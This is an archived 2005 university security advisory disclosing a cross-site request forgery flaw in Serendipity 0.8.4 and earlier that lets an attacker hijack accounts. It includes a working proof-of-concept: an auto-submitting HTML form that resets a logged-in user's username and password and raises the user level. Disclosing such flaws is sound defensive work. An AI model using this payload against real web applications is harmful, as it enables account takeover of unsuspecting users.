lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <433BF480.1050007@infosys.tuwien.ac.at>
Date: Thu Sep 29 15:05:54 2005
From: enji at infosys.tuwien.ac.at (Nenad Jovanovic)
Subject: Serendipity: Account Hijacking / CSRF
	Vulnerability

===========================================================
Serendipity: Account Hijacking / CSRF Vulnerability
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0509-001, September 29, 2005
===========================================================


Affected applications
----------------------

Serendipity (www.s9y.org)

Versions 0.8.4 and prior.


Description
------------

An attacker is able to change the username and password of a logged-in
user (and can therefore hijack his account) by tricking the user into
clicking a link to a page with the following contents:

     <form 
action="http://your-server/path-to-s9y/serendipity_admin.php?serendipity[adminModule]=personal&amp;serendipity[adminAction]=save" 
method="post">
         <input type="text" name="username" value="evilguy" />
         <input type="text" name="password" value="evilpass" />
         <input type="text" name="realname" value="John Doe" />
         <input type="text" name="userlevel" value="255"/>
         <input type="text" name="email" value="john@...mple.com" />
         <input type="text" name="lang" value="en"/>
         <input type="submit" name="SAVE" value="Save" />
     </form>

     <script type="text/javascript">
       document.forms[0].submit();
     </script>

The fields "your-server" and "path-to-s9y" in the form's action
attribute have to be adjusted accordingly.

Similar attacks (termed as "Cross-Site Request Forgery" or CSRF) can be
launched for performing other requests disguised as the victim.
However, this problem is not limited to Serendipity, but affects a large
number of comparable web applications available at this time.


Solution
---------

Version 0.8.5 of Serendipity is reported by the developers to fix
the Account Hijacking vulnerability as well as the general CSRF problem
itself.


Acknowledgements
-----------------

Thanks to Serendipity developer Garvin Hicking for his quick response
and professional cooperation.


Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ